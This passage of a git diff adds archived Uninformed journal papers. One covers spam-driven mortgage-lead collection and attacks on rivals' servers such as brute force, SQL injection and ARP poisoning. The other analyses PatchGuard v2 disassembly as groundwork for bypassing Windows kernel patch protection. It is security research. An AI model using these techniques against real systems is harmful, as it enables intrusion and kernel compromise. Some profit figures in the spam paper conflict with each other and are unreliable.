drove +just enough profits to keep the company afloat. The term collector in +this paper in its loosest sense is a name given to an individual who +collects mortgage leads for the purpose of attaining a profit. A lead +was first bought at a flat rate of 10 US dollars which at an average of +200 per sale the profit for the collector was a comfortable 2,000 US +dollars. On the flip side of things, Corp. A was successfully +conducting business averaging about 10 sales for every 100 leads they +bought. With these numbers consistently coming through Corp. A made a +profit of about 10,000 US dollars for every successful sale. A little +math illustrates the return on investment ratio: + + +Investment: 200 x 10 = 2000 +Average Profit: 10,000 x 20 = 200,000 +Return on Investment: 200,000 - 2,000 = 198,000 + + +Based on the collection of an insignificant amount of information, +collectors aggressively innovated their collections methods. I will +elaborate on what I mean shortly. For now, I will focus on what happened +immediately after. + +New collection methods drove the lead delivery out of control and soon +Corp. A was inundated with so many leads that they had to start turning +them down until they figured out how to process the volume. In order to +handle the number of leads they were now attaining, they decided to +partner with smaller companies and sell them the overflow. Corp. A was +now growing exponentially fast, and in a period of roughly five to six +years, this simple idea drove Corp. A from bankruptcy to a multi-billion +dollar corporation. It is actually rumored that at one point in time +this company consumed 100 of the mortgage leads ever processed in the +United States. + +People and greed do not mix very well, and as I mentioned, earlier +collectors and partners wanted more money, so soon other companies began +buying leads from collectors too. I argue that at the time the mortgage +industry was large enough for everyone to profit nicely from it, however +greedy collectors began selling bogus or non-exclusive leads. This +forced mortgage firms to develop a loose classification model for +grading the quality of a lead as an addition to the classification of +the leads themselves. + +- Exclusive + + An exclusive lead is one that is sold only to one mortgage firm and never again + redistributed. The value of these leads was often higher than non-exclusive, or + as they decided to term them, semi-exclusive leads. + +- Semi-Exclusive + + Yes, semi-exclusive. I honestly cannot define this, as this is an + oxymoron itself, but someone somewhere. An individual who + wishes to stay anonymous informed me of terms commonly used. + decided to call non-exclusive leads semi-exclusive to allow them to + be resold. It's a nice euphemism, though. + + +Grade | Description +--------+------------- +Green | Confirmed Valid Lead +Yellow | Characteristics of a bad lead but enough good to buy +Red | Confirmed Invalid Lead + +The reliability of a bulk set is assessed by the person buying them at +the time of sale. The person interested in buying the leads takes a +random set from the bulk he is receiving and personally verifies their +validity. A rating is then given depending on the number of missed +leads he finds. The grading is different with every person you deal +with, but in short a lead is only Green if validated. A validated lead +is one that is confirmed through the person who's information was sold +to begin with (The loan application candidate) goes through.. A yellow +lead is a lead with all information accurate but the candidate was +either not home or for some reason was not available. Last, a red lead +is a confirmed invalid or bogus lead. A number of things can give away +a bad lead, for example Zip code and State not matching, or the name +given is John Doe and the address contains Elm Street are probably +indications of a bad lead. + + +5) The War + +Now that I have indulged you with the whereabouts and importance of a +lead, I will discuss how they are obtained. I mentioned above how far an +individual would go as a result of greed? Below I describe their +actions, which outlines their (at times) unethical behavior and +persistence to attain more of the goods. + + +5.1) Self Indulgence + +When the collector decides to go a straight route (in terms of their +industry), they can invest some time and money into setting up an +infrastructure to lure potential clients to their web site. They first +need to build a site that resembles a loan agency that allows visitors +to send their applications to them. Once the collector has a website +saving information to a database, he now hires mailers or spammers to +advertise his website. The average return on spam has been extremely +dynamic, and with more advanced filtering mechanisms in place, all a +spammer can hope for is more effective evasion methods. The leads +collected through this method are, on average, valued between eight and +twelve US dollars per lead only because they are exclusive opt-ins. An +opt-in is a user who wishes to recieve information regarding the service +or product you provide. (i.e. no one else should have this information +as they obtained it directly from the client). There have been +instances when leads are scarse however, and opt-ins sold for over +twenty US dollars a lead. Semi-exclusive (or non-exclusive) leads on +the other hand are usually half or less than the price of an exclusive +lead. + +The second method of collection is not as trivial as the first one +sounds, although the first is a bit more involved than I actually +described. I will elaborate further on what it takes to successfully +build the infrastructure described above shortly. + + +5.2) Thievery + +Thievery obviously refers to stealing, and to steal, the collector has +to choose from an abundance of targets. Essentially, anyone +constructing an environment to collect leads themselves is a possible +target. Things fall into place fairly easily for a collector wanting to +find more targets -- recall how collectors use mailers as resources to +advertise their websites? This is a pretty viable method for collection +however, alternative methods do exist and collectors use any and all +possible enumeration methods they can think of. First, lets dive into +the details of what collectors looking to construct websites need to do +before hiring mailers since this is directly related to the enumeration +of targets. + + +5.3) Setting up an Infrastructure + +So far all this seems pretty straight forward; they setup a webserver to +collect information about the people interested in mortgage loans and +the mailers responsible for advertising get a sales commission for leads +collected by their spam. Unsolicited e-mail, often of a commercial +nature, sent indiscriminately to multiple mailing lists, individuals, or +newsgroups; junk e-mail. run. To complete the cycle, the people +interested in loans receive an email which sparks their interest and +they navigate to the link found in the email. Collectors are usually +ambitious and make an eager attempt at keeping their domains, websites, +and mailers going round the clock. In the United States it is illegal +to spam a person without their consent, and to use spam as advertisement +to a website (the loan forms) hosted on a webserver in the US is not too +common but they do exist. The easiest thing for a collector to do is to +find a hosting provider in a communist country with no regard for the +content placed on their servers. The technical term for this type of +service is bullet-proof-hosting. A bullet-proof-host is a node on a +provider's network with extremly loose Terms of Service, often allowing +them to spam or host any content they wish. Usually the provider resides +in a third world or communist country.. The average price for such a +service is about 2,500 US dollars a month. An alternative to dishing out +large amounts of cash for hosting services is using a bot network. A +distributed collection of agents (bots) connected and controlled by a +central authority.. Usually though, bot networks are pretty dynamic and +don't fit the necessary requirements to host this type of content. If a +collector pays a mailer to spam his site for two or three days and the +host goes down the first night (because of an unreliable bot host) a lot +is lost and so generally experienced folks tend to pay for reliable +hosting. + +Often, the businesses providing the bullet-proof-hosting servers are +relatively well known, and if they are known so is their allotted IP +space. This, in turn, makes finding servers hosting mortgage +applications a piece of cake. All one has to do is scan a known IP +segment for specific criteria and keep track of those that fit the +profile. Once a worthy target list has been collected, the attacks +follow. An interesting fact about the individuals involvement in this +industry is that nothing either one is doing is really all that legal. +This, in fact, allows an attacker to launch whatever type of attack he +wants on the victim machine with little to no worry about legal +repercussions. Often a collection machine will have several required +services open to the Internet, for example: http, ssh, ftp, mysql or +mssql and sometimes an administrative web interface. The scope of an +attack is unlimited and the number of man hours invested directly +reflects on the amount of traffic the victim website attracts. It is +even pretty common for certain prowlers to lease a server from the same +segment the victim machine is on simply to increase their odds of +breaching the host. The following shortly describes common attack +practices launched against victim websites. + +- Brute-force Enumeration + + An attacker will attempt to guess login and password pairs on any if + not all of these services. Usually this kind of attack is not too + stealthy, but remember there is little worry - I mean the victim + cannot simply pick up the phone and call his lawyer can he? + +- SQL Injection + + If any of the web interfaces are accessible through the site, sql + injection attacks are another vector for entry. Although the success + ratio of sql injection is now relatively low, there are still some + low hanging fruit to find and be assured someone greedy and + ambitious enough will find it. + +- Classic Attacks + + With the massively large number of exploits developed and released to + the public daily, searching and launching attacks is a frequent action. + This sometimes opens up a new market for exploit writers looking to + make some quick cash. Collectors can advertise the need for an exploit + and place a price on a particular application. There are even online + auctions that have been built specifically for this purpose. + +- Passive / Passive Aggressive + + When an attacker decides to lease a machine on the same segment, it + is usually because they failed to remotely compromise the victim's + machine. As a last resort they can do several things to retrieve + the information they are looking for. The attacker can launch an + ARP Poisoning attack and sniff all the incoming traffic to the + victim machines, an attacker can simply redirect all the client + requests to himself and collect the leads himself, or even hope for + the victim himself to logon and perform a man-in-the middle attack to + passively collect credentials. + + +6) More on The Money + +In this section, I will associate the roles described above with the +amount of money they can generate. As described earlier, the mailer +serves as the core distributor of an advertising campaign. As a company +would pay a marketing company for it to advertise its products, a +collector pays a mailer to generate leads (e.g advertise and generate +revenue). He can also simply take matters into his or her own hands and +do the dirty work himself. If a mailer is hired however, to properly +track what a mailer collects there is a nifty procedure in place. Each +mailer is given a unique ID number and the link spammed in each email +contains the ID number. When a client submits information regarding his +loan inquiry, the mailer's ID number is included and the collector now +has record of how many leads a mailer is generating. This method of +tracking referrals is well adopted in most spam/advertising related +industries online. The majority of spyware and adware vendors leverage +this method of tracking to pay their affiliates. + +A single spam run can be as large as two million emails. The time +needed to complete a run that big depends on a few key factors - the +method used for distribution and the spam software being used. If a +decent sized list of proxies is used you can send an average of about +forty thousand emails per half hour using Dark Mailer . With a little +math we can compute that transmitting two million emails would take +about twenty-five hours. More over, if I were to shoot low and say that +.01 percent of two million emails from a single spam run actually +worked, the return for the collector on exclusive leads is about 200 +leads per mailer at 10 dollars a lead results to about 2,000 USD. The +mailers recieve on average about 8 per referal and can usually track +their statistics through a web-based front end tracking their return on +time investment in real-time. + + +7) The Disaster + +So far, I've covered in fairly good detail the structure of what was +once a falling corporation taking a 180 degree turn and rising straight +back up to the top. It is too well known though, that what goes up must +come down and twice as fast as it went up. + +The core of the problems started out when mailers began to falsify the +content of the spam for their collectors. Mailers noticed that the +lower the rate they advertised the more traffic they would drive to the +collector's website. More traffic indicated a higher collection of +leads which resulted in more money. Whether the mailers were aware of +the laws before they did what they did is unknown to me but their lies +resulted in law suites unfolding from all sides. Unhappy individuals +who had been promised a 1.9 - 2.5 interest rate on a loan began filing +law suites against the collectors. This resulted in a fairly large +chain of angry partners. The hierarchy below indicates the ripple of +disaster that came about. + + +8) Conclusion + +It is fair to say that ambition can get the best out of people Indeed, +I'm sure these individuals are trying their best to make a profit out of +this endeavor. Unfortunately, it is not the most appropriate way to +make a living; it does however show that their perception is a bit +different. Most of them feel that by staying away from selling drugs +and pornography online, they are not hurting anyone and simply taking +advantage of a good way to make some money. In retrospect, I agree, but +I refuse to condone spam for any reason, it consumes countless corporate +man hours and is a general nuisance to anyone who receives email. + + +A. References + + Spammer-X, ``Inside the spam cartel." http://www.oreilly.com/catalog/1932266860/. + Boiler Room, http://www.imdb.com/title/tt0181984/. + + + + diff --git a/uninformed/5.5.pdf b/uninformed/5.5.pdf new file mode 100644 index 0000000..d2d5e66 Binary files /dev/null and b/uninformed/5.5.pdf differ diff --git a/uninformed/5.txt b/uninformed/5.txt new file mode 100644 index 0000000..ec80d9b --- /dev/null +++ b/uninformed/5.txt @@ -0,0 +1,29 @@ +Exploitation Technology +Implementing a Custom X86 Encoder +skape +This paper describes the process of implementing a custom encoder for the x86 architecture. To help set the stage, the McAfee Subscription Manager ActiveX control vulnerability, which was discovered by eEye, will be used as an example of a vulnerability that requires the implementation of a custom encoder. In particular, this vulnerability does not permit the use of uppercase characters. To help make things more interesting, the encoder described in this paper will also avoid all characters above 0x7f. This will make the encoder both UTF-8 safe and tolower safe. +txt | html | pdf + +Preventing the Exploitation of SEH Overwrites +skape +This paper proposes a technique that can be used to prevent the exploitation of SEH overwrites on 32-bit Windows applications without requiring any recompilation. While Microsoft has attempted to address this attack vector through changes to the exception dispatcher and through enhanced compiler support, such as with /SAFESEH and /GS, the majority of benefits they offer are limited to image files that have been compiled to make use of the compiler enhancements. This limitation means that without all image files being compiled with these enhancements, it may still be possible to leverage an SEH overwrite to gain code execution. In particular, many third-party applications are still vulnerable to SEH overwrites even on the latest versions of Windows because they have not been recompiled to incorporate these enhancements. To that point, the technique described in this paper does not rely on any compile time support and instead can be applied at runtime to existing applications without any noticeable performance degradation. This technique is also backward compatible with all versions of Windows NT+, thus making it a viable and proactive solution for legacy installations. +txt | html | pdf + +Fuzzing +Effective Bug Discovery +vf +Sophisticated methods are currently being developed and implemented for mitigating the risk of exploitable bugs. The process of researching and discovering vulnerabilities in modern code will require changes to accommodate the shift in vulnerability mitigations. Code coverage analysis implemented in conjunction with fuzz testing reveals faults within a binary file that would have otherwise remained undiscovered by either method alone. This paper suggests a research method for more effective runtime binary analysis using the aforementioned strategy. This study presents empirical evidence that despite the fact that bug detection will become increasingly difficult in the future, analysis techniques have an opportunity to evolve intelligently. +code.tgz | txt | html | pdf + +General Research +Wars Within +Orlando Padilla +In this paper I will uncover the information exchange of what may be classified as one of the highest money making schemes coordinated by 'organized crime'. I will elaborate on information gathered from a third party individual directly involved in all aspects of the scheme at play. I will provide a detailed explanation of this market's origin, followed by a brief description of some of the actions strategically performed by these individuals in order to ensure their success. Finally, I will elaborate on real world examples of how a single person can be labeled a spammer, malware author, cracker, and an entrepreneur gone thief. For the purposes of avoiding any legal matters, and unwanted media, I will refrain from mentioning the names of any individuals and corporations who are involved in the schemes described in this paper. +txt | html | pdf + +Wireless Technology +Fingerprinting 802.11 Implementations via Statistical Analysis of the Duration Field +Johnny Cache +The research presented in this paper provides the reader with a set of algorithms and techniques that enable the user to remotely determine what chipset and device driver an 802.11 device is using. The technique outlined is entirely passive, and given the amount of features that are being considered for inclusion into the 802.11 standard, seems quite likely that it will increase in precision as the standard marches forward. The implications of this are far ranging. On one hand, the techniques can be used to implement innovative new features in Wireless Intrusion Detection Systems (WIDS). On the other, they can be used to target link layer device driver attacks with much higher precision. +code.ref | html | pdf + diff --git a/uninformed/6.1.txt b/uninformed/6.1.txt new file mode 100644 index 0000000..69fc5b0 --- /dev/null +++ b/uninformed/6.1.txt @@ -0,0 +1,2606 @@ +Subverting PatchGuard Version 2 +Skywing +12/2006 +skywing@valhallalegends.com +http://www.nynaeve.net + +1) Foreword + +Abstract: Windows Vista x64 and recently hotfixed versions of the Windows +Server 2003 x64 kernel contain an updated version of Microsoft's kernel-mode +patch prevention technology known as PatchGuard. This new version of +PatchGuard improves on the previous version in several ways, primarily dealing +with attempts to increase the difficulty of bypassing PatchGuard from the +perspective of an independent software vendor (ISV) deploying a driver that +patches the kernel. The feature-set of PatchGuard version 2 is otherwise +quite similar to PatchGuard version 1; the SSDT, IDT/GDT, various MSRs, and +several kernel global function pointer variables (as well as kernel code) are +guarded against unauthorized modification. This paper proposes several +methods that can be used to bypass PatchGuard version 2 completely. Potential +solutions to these bypass techniques are also suggested. Additionally, this +paper describes a mechanism by which PatchGuard version 2 can be subverted to +run custom code in place of PatchGuard's system integrity checking code, all +while leaving no traces of any kernel patching or custom kernel drivers loaded +in the system after PatchGuard has been subverted. This is particularly +interesting from the perspective of using PatchGuard's defenses to hide kernel +mode code, a goal that is (in many respects) completely contrary to what +PatchGuard is designed to do. + +Thanks: The author would like to thank skape, bugcheck, and Alex Ionescu. + +Disclaimer: This paper is presented in the interest of education and the +furthering of general public knowledge. The author cannot be held responsible +for any potential use (or misuse) of the information disclosed in this paper. +While the author has attempted to be as vigilant as possible with respect to +ensuring that this paper is accurate, it is possible that one or more mistakes +might remain. If such an inaccuracy or mistake is located, the author would +appreciate being notified so that the appropriate corrections can be made. + +2) Introduction + +With x64 versions of the Windows kernel, Microsoft has attempted to take an +aggressive stance[1] against the use of a certain class of techniques that have +been frequently used to ``extend'' the kernel in potentially unsafe fashions +on previous versions of Windows. This includes patching the kernel itself, +hooking the kernel's system service tables, redirecting interrupt handlers, +and several other less common techniques for intercepting control of execution +before the kernel is reached, such as the alternation of the system call +target MSR. + +The technology that Microsoft has deployed to prevent the unauthorized +patching of the kernel that has been historically rampant on x86 is known as +PatchGuard. This technology was initially released with Windows Server 2003 +x64 Edition and Windows XP x64 Edition (known as PatchGuard version 1). The +x64 editions of Windows Vista, and recently hotfixed versions of the Windows +Server 2003 x64 kernel contain a newer version of the PatchGuard technology, +known as PatchGuard version 2. The new version is designed to make it +significantly more difficult for independent software vendors (ISVs) to +deploy, in the field, solutions that involve patching the kernel after +disabling the kernel patch protection mechanisms afforded by PatchGuard. The +inner details of PatchGuard itself are much the same as they were in +PatchGuard version 1 and thus will not be discussed in detail in this paper +(excluding version 2's improved anti-debugging and anti-patch technologies). +A sufficiently interested reader wishing some more background information on +the subject may find out more about how PatchGuard version 1 functions in +Uninformed's previous article [2] on the subject, ``Bypassing PatchGuard on +Windows x64''. + +PatchGuard version 2 takes the original PatchGuard release and attempts to +plug various holes in its implementation of an obfuscation-based anti-patching +system. In this respect, it has met some mixed success and failure. Although +the new PatchGuard version does, on the surface, appear to disable the +majority of the bypass techniques that had been proposed [2] as means to disable +the original PatchGuard release, at least several of these techniques may be +fairly trivially re-enabled through some minor alterations or additional new +code. Furthermore, it is still possible to bypass PatchGuard version 2 +without relying on dangerous (version-specific) constructs such as hard-coded +offsets or code fingerprinting on frequently changing code. Additionally, +aside from techniques that are based on disabling PatchGuard itself, there +still exist several potential bypass mechanisms that have a strong potential +to be ``future-compatible'' with new PatchGuard versions by virtue of +preventing PatchGuard from even detecting that unauthorized alternations to +the kernel have been made (and thus isolating themselves from any +obfuscation-based changes to how PatchGuard's system integrity check is +invoked). To Microsoft's credit, however, the resilience of PatchGuard to +being debugged and analyzed has been significantly improved (at least with +regard to certain key steps, such as initialization at boot time). + +3) Notable Protection Mechanisms + +PatchGuard version 2 implements a variety of anti-debug, anti-analysis, and +obfuscation mechanisms that are worth covering. Not all of PatchGuard's +defenses are covered in detail in this paper, and those mechanisms (such as +the obfuscation of PatchGuard's internal data structures) that are at least +the same in principle as the previous PatchGuard release (and were already +disclosed by Uninformed's previous article [2] on PatchGuard) are additionally +not covered by this paper. + +3.1) Anti-Debug Code During Initialization + +That being said, there are still a number of interesting things to examine as +far as PatchGuard's protection mechanisms go. Many of these techniques are on +their own worthy of discussion, simply from the perspective of their worth as +general debug/analysis protection mechanisms. PatchGuard version 2 begins as +an appended addition to the nt!SepAdtInitializePrivilegeAuditing routine in +the kernel (PatchGuard version 2 continues the tactic of misleading and/or +bogus function names that PatchGuard version 1 introduced). This routine is +responsible for performing the bulk of PatchGuard's initialization, including +setting up the encrypted PatchGuard context data structures. Unlike +PatchGuard version 1, the initialization routine is littered with statements +that are intended to frustrate debugging, such as the following construct that +enters an infinite loop if a debugger is connected (this particular construct +is used in many places during PatchGuard initialization): + +cli +cmp cs:KdDebuggerNotPresent, r12b +jnz short continue_initialization_1 +infinite_loop_1: +jmp short infinite_loop_1 +sti + +This particular approach is not all that robust as currently implemented in +PatchGuard version 2 today. It remains relatively easy to detect these +references to nt!KdDebuggerNotPresent ahead of time, and disable them. If +Microsoft had elected to corrupt the execution context in a creative way on +each occurrence (such as zeroing some registers, or otherwise arranging for a +failure to occur much later on if a debugger was attached) before entering the +forever loop, then these constructs might have been slightly effective as far +as anti-debugging goes. + +Other constructs include the highly obfuscated selection of a randomized set +of bogus pool tags used to allocate PatchGuard data structures. Like +PatchGuard version 1, PatchGuard version 2 uses a randomly chosen bogus pool +tag and randomly adjusted allocation sizes in an attempt to frustrate easy +detection of the PatchGuard context in-memory by scanning pool allocations. +The following is an example of one of the sections of code used by PatchGuard +to randomly pick a pool tag and random allocation delta from a list of +possible pool tags. The actual allocation size is the random allocation delta +plus the minimum size of the PatchGuard context structure, truncated at 2048 +bytes. Here, the rdtsc instruction is used for random number generation +purposes (readers that have examined the previous [2] PatchGuard paper may +recognize this random number generation construct; it is used throughout +PatchGuard anywhere a random quantity is required). + +; +; Generate a random value, using rdtsc. +; +lea ebx, [r14+r13+200h] +mov dword ptr [rsp+0A28h+Timer], ebx +rdtsc +mov r10, qword ptr [rsp+0A28h+arg_5F8] +shl rdx, 20h +mov r11, 7010008004002001h +or rax, rdx +mov rcx, r10 +xor rcx, rax +lea rax, [rsp+0A28h+var_2C8] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +mov [rsp+0A28h+var_2C8], rax +xor eax, edx +mov [rsp+0A28h+arg_1F0], rdx +; +; This is essentially a switch(eax & 7), where eax +; is a random value. Each case statement selects +; a unique obfuscated pooltag value. The magical +; 0x432E10h constant below is the offset used to +; jump to the switch case handler selected. +; +lea rdx, cs:400000h +and eax, 7 +mov ecx, [rdx+rax*4+432E10h] +add rcx, rdx +jmp rcx +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0D098D0D8h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 6 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0B2AD31A1h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +rol r9d, 1 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 85B5910Dh +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 2 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 0A8223938h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +xor r9d, 3 +ror r9d, 0Fh +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 67076494h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +rol r9d, 4 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 288C49EDh +mov r9d, dword ptr [rsp+0A28h+var_9D8] +ror r9d, 5 +jmp DoAllocation +-------------------------------------------------- +mov dword ptr [rsp+0A28h+var_9D8], 4E574672h +mov r9d, dword ptr [rsp+0A28h+var_9D8] +xor r9d, 6 +ror r9d, 18h +jmp DoAllocation +-------------------------------------------------- +DoAllocation: +; +; Get another random value (for the allocation size), +; and deobfuscate the pooltag value that was selected. +; +; Eventually, the value ending up in "r9d" is used as +; the pooltag value. +; +rdtsc +shl rdx, 20h +mov rcx, r10 +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_858] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +mov [rsp+0A28h+ValueName], rdx +mov r9, rax +mov [rsp+0A28h+var_858], rax +xor r9d, edx +mov eax, 4EC4EC4Fh +mov ecx, r9d +mul r9d +shr edx, 3 +shr r9d, 5 +mov r8d, r9d +mov eax, 4EC4EC4Fh +imul edx, 1Ah +sub ecx, edx +add ecx, 61h +shl ecx, 8 +mul r9d +shr edx, 3 +shr r9d, 5 +mov eax, 4EC4EC4Fh +imul edx, 1Ah +sub r8d, edx +mul r9d +add r8d, 41h +mov eax, 4EC4EC4Fh +or r8d, ecx +shr edx, 3 +mov ecx, r9d +shr r9d, 5 +shl r8d, 8 +imul edx, 1Ah +sub ecx, edx +add ecx, 61h +or ecx, r8d +shl ecx, 8 +mul r9d +shr edx, 3 +imul edx, 1Ah +sub r9d, edx +add r9d, 41h +or r9d, ecx +rdtsc +shl rdx, 20h +mov rcx, r10 +mov r8d, r9d ; Tag +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_2E8] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, r11 +mul rcx +; +; Perform the actual allocation. We're requesting NonPagedPool, +; with the random pooltag selected by the deobfuscation and +; randomization code above. The actual size of the block being +; allocated here is given in ebx, with a random "fuzz factor" that +; is added to this minimum allocation size, then truncated to a +; maximum of 2047 bytes. +; +xor ecx, ecx ; PoolType +mov [rsp+0A28h+var_310], rdx +xor rdx, rax +mov [rsp+0A28h+var_2E8], rax +and edx, 7FFh +add edx, ebx ; NumberOfBytes +call ExAllocatePoolWithTag + +3.2) Expanded Set of DPC Routines + +Other protection mechanisms used in PatchGuard version 2 include an expanded +set of DPC routines used to arrange for the execution of the PatchGuard +integrity check routine. Recall that in PatchGuard version 1, there existed a +set of three possible DPC routines. In PatchGuard version 2, this set of +potential DPC routines that can be repurposed for PatchGuard's use has been +expanded to ten possibilities. One DPC routine is selected at boot time from +this set of ten possiblities, and from that point is used for all further +PatchGuard operations for the lifetime of the session. The fact that only one +DPC routine is used in a particular Windows session is a weakness that is +inherited from the previous PatchGuard version (as the reader will discover, +eventually comes in handy if one is set on bypassing PatchGuard). The DPC +routine to be used for the current boot session is selected in the +nt!SepAdtInitializePrivilegeAuditing routine, much the same as how the bogus +pooltag to be used for all PatchGuard allocations is selected: + +INIT:0000000000832741: +PatchGuard_Pick_Random_DPC: +; +; Use the time stamp counter as a random seed. +; +rdtsc +shl rdx, 20h +mov rcx, r15 +or rax, rdx +xor rcx, rax +lea rax, [rsp+0A28h+var_360] +xor rcx, rax +mov rax, rcx +ror rax, 3 +xor rcx, rax +mov rax, 7010008004002001h +mul rcx +mov [rsp+0A28h+var_360], rax +mov rcx, rdx +mov qword ptr [rsp+0A28h+arg_260], rdx +xor rcx, rax +mov rax, 0CCCCCCCCCCCCCCCDh +mul rcx +shr rdx, 3 +; +; The resulting value in `rax' is the index into a switch jump table +; that is used to locate the DPC to be repurposed for initiating +; PatchGuard checks for this session. +; +lea rax, [rdx+rdx*4] +add rax, rax +sub rcx, rax +jmp PatchGuard_DPC_Switch + +INIT:0000000000832317: +PatchGuard_DPC_Switch: +; +; The address of the case statement is formed by adding the image base (here, +; being loaded into `rdx') and an RVA in the table indexed by rax. +; +lea rdx, cs:400000h +mov eax, ecx +; +; Locate the case statement RVA by indexing the jump offset table. +; +mov ecx, [rdx+rax*4+432E60h] +; +; Add it to the image base to form a complete 64-bit address. +; +add rcx, rdx +; +; Execute the case handler. +; +jmp rcx + + +; +; The set of case statements are as follows: +; +; Each case statement block simply loads the full 64-bit address +; of the DPC routine to be repurposed for PatchGuard checks into +; the r8 register. This register is later stored into one of +; PatchGuard's internal data structures for future use. +; + +lea r8, CmpEnableLazyFlushDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, _CmpLazyFlushDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimeRefreshDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimeZoneDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpCenturyDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, ExpTimerDpcRoutine +jmp short PatchGuardSelectDpcRoutine +lea r8, IopTimerDispatch +jmp short PatchGuardSelectDpcRoutine +lea r8, IopIrpStackProfilerTimer +jmp short PatchGuardSelectDpcRoutine +lea r8, KiScanReadyQueues +jmp short PatchGuardSelectDpcRoutine +lea r8, PopThermalZoneDpc +; +; (fallthrough from last case statement) +; +INIT:0000000000832800: +PatchGuardSelectDpcRoutine: +xor ecx, ecx +; +; Store the DPC routine into r14+178. r14 points to one of +; the PatchGuard context structures in this particular instance. +; +mov [r14+178h], r8 + +Much like PatchGuard version 1, each of the DPCs selected for use in launching +the PatchGuard integrity checks has a legitimate function. Furthermore, the +DPC routines are ones that are important for normal system operation, thus it +is not possible for one to simply detect all DPCs that refer to these DPC +routines and cancel them. Instead, much as with PatchGuard version 1, if one +wanted to go the route of blocking PatchGuard's DPC, a mechanism to detect the +particular PatchGuard DPC (as opposed to the legitimate system invocations +thereof) must be developed. This aspect of PatchGuard's obfuscation +mechanisms is relatively similar to version 1, other than the logical +extension to ten DPCs instead of three DPCs. + +3.3) Self-Decrypting and Mutating System Integrity Check Routine + +PatchGuard version 2 also inherits the capability to encrypt its +datastructures and executable code in-memory from version 1. This is a +defensive mechanism that intends to make it difficult for an attacker to +perform a classic egghunt style search, wherein the attacker has devised an +identifiable signature for PatchGuard data structures that can be used to +locate it in an exhaustive non-paged-pool memory scan. From this perspective, +the obfuscation and encryption of PatchGuard code and data structures that are +dynamically allocated is still a reasonably strong defensive mechanism. +Unfortunately for Microsoft, though, some of the data structures linking to +PatchGuard are internal system structures (such as a KDPC and associated +KTIMER used to kick off PatchGuard execution). This presents a weakness that +could be potentially used to identify PatchGuard structures in memory (which +will be explored in more detail later). + +The encryption of PatchGuard's internal context structures was covered by +Uninformed's original paper [2] on the subject. However, the mechanism by which +PatchGuard obfuscates its system integrity checking and validation routines +was not discussed. This mechanism is novel enough to warrant some +explanation. The technique used to obfuscate PatchGuard's executable code +in-memory involves two layers of decryption/deobfuscation functions, each of +which decrypts the next layer. After both layers have run their course, +PatchGuard's validation routines are plaintext in memory and are then directly +executed. + +The first decryption layer is the code block that is called from the +repurposed DPC routine selected by PatchGuard at boot time. Its job is to +decrypt itself (in 8 byte chunks, starting with the second instruction in the +function). After the decryption of the this code block is complete, the +decryption stub continues on to decrypt a second code block (the actual +PatchGuard validation routine). When this second decryption/deobfuscation +cycle is completed, the decryption stub then executes the actual PatchGuard +system integrity check routine. + +As noted above, the first task for the decryption stub is to decrypt itself. +Except for the first instruction of the stub, the entire routine is encrypted +when entered. The first instruction encrypts itself and decrypts the next +instruction. The following instruction decrypts the next two instructions, +and soforth. This is accomplished by a series of four byte long instructions +that xor an eight byte quantity with a decryption key (initially starting at +the current instruction pointer - here, rcx and rip always have the same +value. An example of how this process works is illustrated below: + +; +; rcx: Address of the decryption stub (same as rip) +; rdx: Decryption key +; +Breakpoint 5 hit +nt!ExpTimeRefreshDpcRoutine+0x20a: +fffff800`0112c98b ff5538 call qword ptr [rbp+38h] +0: kd> u poi(rbp+38) +; +; Note that beyond the first instruction, the decryption stub is initially seemingly +; garbage data (though it has an apparent pattern to it, since it is merely obfuscated +; by xor). +; +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +fffffadf`f6e6d561 88644d68 mov byte ptr [rbp+rcx*2+68h],ah +fffffadf`f6e6d565 62 ??? +fffffadf`f6e6d566 d257df rcl byte ptr [rdi-21h],cl +fffffadf`f6e6d569 88644d78 mov byte ptr [rbp+rcx*2+78h],ah +fffffadf`f6e6d56d 62 ??? +fffffadf`f6e6d56e d257ef rcl byte ptr [rdi-11h],cl +fffffadf`f6e6d571 88644d48 mov byte ptr [rbp+rcx*2+48h],ah +0: kd> t +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx +0: kd> r +; +; Note the initial input arguments. rcx points to the decryption stub's first +; instruction (same as rip), and rdx is the decryption key. +; +rax=fffffadff6e6d55d rbx=fffff8000116d894 rcx=fffffadff6e6d55d +rdx=601c55c0cf06e32a rsi=fffff800003c7ad0 rdi=0000000000000003 +rip=fffffadff6e6d55d rsp=fffff800003c51f8 rbp=fffff800003c7ad0 + r8=0000000000000000 r9=0000000000000000 r10=0000000001c7111e +r11=fffff800003c54c0 r12=fffff8000116d858 r13=fffff800003c5370 +r14=fffff80001000000 r15=fffff800003c60a0 +iopl=0 nv up ei pl zr na po nc +cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00000246 +fffffadf`f6e6d55d f0483111 lock xor qword ptr [rcx],rdx ds:002b:fffffadf`f6e6d55d=684d6488113148f0 + +; +; After allowing the decryption of the stub to progress, we see the stub in its executable +; form. The first instruction is initially re-encrypted after executed, but a later +; instruction in the decryption stub returns the 